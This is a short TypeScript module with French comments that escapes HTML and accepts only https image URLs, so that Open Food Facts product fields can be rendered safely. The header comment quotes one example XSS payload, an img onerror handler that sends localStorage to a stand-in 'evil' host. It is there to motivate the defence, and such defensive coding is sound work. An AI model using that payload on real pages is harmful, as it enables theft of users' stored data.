// Garde-fous de rendu HTML pour main.ts. Open Food Facts est éditable par n'importe qui et
// `web/index.html` ne pose aucune CSP : `product_name`, `serving_size`, `nutriscore_grade` et
// `image_url` doivent être traités comme non fiables avant tout rendu — jamais interpolés bruts
// dans un `innerHTML` (revue PR #549, thread 1317 § 1 : une fiche renommée en
// `"><img src=x onerror="fetch('https://evil/?'+localStorage)">` exécuterait dans l'origine de
// l'app, qui portera auth et données de santé — CLAUDE.md § Auth et données sensibles).

const HTML_ESCAPES: Record<string, string> = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

/** Échappe une chaîne pour un usage sûr en texte ou en valeur d'attribut HTML entre guillemets doubles. */
export function escapeHtml(value: string): string {
  return value.replace(/[&<>"']/g, (char) => HTML_ESCAPES[char] ?? char);
}

/**
 * Valide qu'une URL est utilisable comme `src` d'image : schéma `https:` uniquement (rejette
 * `javascript:`, `data:`, `http:` non chiffré, et tout texte qui n'est pas une URL valide).
 * Renvoie `null` plutôt que de lever, pour un usage direct en garde dans un template.
 */
export function safeImageSrc(value: string | null): string | null {
  if (!value) return null;
  try {
    const url = new URL(value);
    return url.protocol === 'https:' ? url.toString() : null;
  } catch {
    return null;
  }
}
